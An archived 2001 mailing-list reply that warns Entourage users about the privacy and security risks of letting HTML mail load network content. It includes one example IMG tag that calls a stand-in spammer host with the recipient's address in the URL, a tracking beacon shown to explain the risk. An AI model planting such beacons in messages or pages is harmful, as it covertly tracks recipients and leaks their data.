On 19.04.01 at 18:10, Paul Berkowitz <[EMAIL PROTECTED]> wrote:
>On 4/19/01 4:42 PM, "Roy" <[EMAIL PROTECTED]> wrote:
>
>>Why don't the graphics appear in HTML mail.
>
>1) Allow network interaction
<rant type="paranoid">
It might be prudent to mention that this has security and privacy
implications!
Depending on how paranoid Entourage is with active content (very, IIRC),
allowing network interaction could expose you to any amount of nastyness.
More likely though, you would be exposing yourself to a privacy invasion
because a spammer sending you a HTML message gets a hit on his web server
whenever you open his message. That allows them to check which addresses
are valid, which subject lines will make _you_ open a message, etc.
Consider HTML like:
<IMG src="http://spam.net/log?[EMAIL PROTECTED];highschooldiploma">
Or even worse, similar HTML autogenerated by a local JavaScript with all
locally available information encoded in the URL. For instance an XML/XSL
combo that tricks the IE rendering engine into executing active content
despite having disabled it in the preferences (a recently reported
potential vulnerability in IE 5.x).
You should take issues such as these into account before making a decision
on whether to use HTML mail and about allowing it network access. Now,
IIRC, Entourage does a pretty good job of protecting you against this kind
of nastyness, but there is no such thing as a secure system (new holes and
bugs are discovered all the time) and you should always think carefully
before opening yourself up to exposure.
</>
--
To unsubscribe: <mailto:[EMAIL PROTECTED]>
To search the archives:
<http://www.mail-archive.com/entourage-talk%40lists.boingo.com/>
